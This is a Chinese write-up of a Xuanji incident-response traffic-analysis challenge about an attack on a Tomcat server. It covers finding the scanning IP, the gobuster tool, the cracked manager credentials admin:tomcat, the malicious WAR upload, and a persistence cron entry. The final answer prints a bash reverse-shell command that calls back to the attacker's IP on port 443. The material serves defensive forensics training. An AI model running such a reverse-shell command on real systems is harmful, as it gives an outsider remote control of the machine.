当前位置: 首页 > news >正文

【玄机-应急平台】第六章 流量特征分析-常见攻击事件 tomcat

【玄机-应急平台】第六章 流量特征分析-常见攻击事件 tomcat

    • 前言:
      • 1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}
      • 2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
      • 3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}
      • 4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}
      • 5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}
      • 6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}
      • 7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息
    • 总结:

前言:

一个不错的应急平台可以练习,感谢玄机应急平台,做点笔记记录一下。

玄机应急平台:https://xj.edisec.net/

流量分析学习专栏学习!

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}

很多SYN的包nmap扫描就是SYN 所以得到ip

在这里插入图片描述

FLAG:14.0.0.120

2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

查询ip发现是广东广州的IP提交即可。

在这里插入图片描述

FLAG:guangzhou

3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}

在这里插入图片描述

FLAG:8080

4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}

在这里插入图片描述

FLAG:gobuster

5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}

找到http上传木马的包,追踪数据流Base64解码

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

FLAG:admin:tomcat

6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}

在这里插入图片描述

FLAG:JXQOZY.war

7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息

在这里插入图片描述

FLAG:/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

总结:

第六章数据包完结,主要是解密,反弹shell命令,ip查询,扫描工具等知知识点🆗期待下期见!

相关文章:

  • 获取域名证书过期时间脚本——筑梦之路
  • PHP短链接短网址生成源码
  • Apache配置与应用
  • 10.GLM
  • SpringMVC-基础架构
  • 基于软件在环的飞控机建模仿真
  • 国外有哪些知名的CG网站?CG平台及云渲染平台
  • Kettle根据分类实现Excel文件拆分——kettle开发31
  • 视频格式转换avi格式怎么弄?分享视频转换方法
  • sqlcoder:7b sqlcoder:15b sqlcoder:70b 有什么区别呢?
  • 直接使用Three.js的 Shape和ExtrudeGeometry创建带孔几何体实现挖孔效果
  • Go模板页面浏览器显示HTML源码问题
  • 百度OCR初探-python
  • 怎么提升机器人外呼的转化效率
  • linux网络编程poll笔记
  • 【跃迁之路】【444天】程序员高效学习方法论探索系列(实验阶段201-2018.04.25)...
  • android 一些 utils
  • Git的一些常用操作
  • in typeof instanceof ===这些运算符有什么作用
  • JS正则表达式精简教程(JavaScript RegExp 对象)
  • miniui datagrid 的客户端分页解决方案 - CS结合
  • Spark VS Hadoop:两大大数据分析系统深度解读
  • Vue 重置组件到初始状态
  • vue-router 实现分析
  • 分布式熔断降级平台aegis
  • 机器学习学习笔记一
  • 使用Envoy 作Sidecar Proxy的微服务模式-4.Prometheus的指标收集
  • 用jquery写贪吃蛇
  • kubernetes资源对象--ingress
  • 智能情侣枕Pillow Talk,倾听彼此的心跳
  • 组复制官方翻译九、Group Replication Technical Details
  • ​MPV,汽车产品里一个特殊品类的进化过程
  • # MySQL server 层和存储引擎层是怎么交互数据的?
  • # Swust 12th acm 邀请赛# [ E ] 01 String [题解]
  • #LLM入门|Prompt#1.8_聊天机器人_Chatbot
  • #基础#使用Jupyter进行Notebook的转换 .ipynb文件导出为.md文件
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • $refs 、$nextTic、动态组件、name的使用
  • (16)UiBot:智能化软件机器人(以头歌抓取课程数据为例)
  • (6)设计一个TimeMap
  • (ibm)Java 语言的 XPath API
  • (pojstep1.1.2)2654(直叙式模拟)
  • (Pytorch框架)神经网络输出维度调试,做出我们自己的网络来!!(详细教程~)
  • (二)springcloud实战之config配置中心
  • (附源码)计算机毕业设计ssm基于B_S的汽车售后服务管理系统
  • (附源码)计算机毕业设计SSM基于健身房管理系统
  • (六)库存超卖案例实战——使用mysql分布式锁解决“超卖”问题
  • (原创)Stanford Machine Learning (by Andrew NG) --- (week 9) Anomaly DetectionRecommender Systems...
  • (转)3D模板阴影原理
  • .libPaths()设置包加载目录
  • .NET Core引入性能分析引导优化
  • .Net mvc总结
  • .NET(C#、VB)APP开发——Smobiler平台控件介绍:Bluetooth组件
  • .NET学习教程二——.net基础定义+VS常用设置
  • [2]十道算法题【Java实现】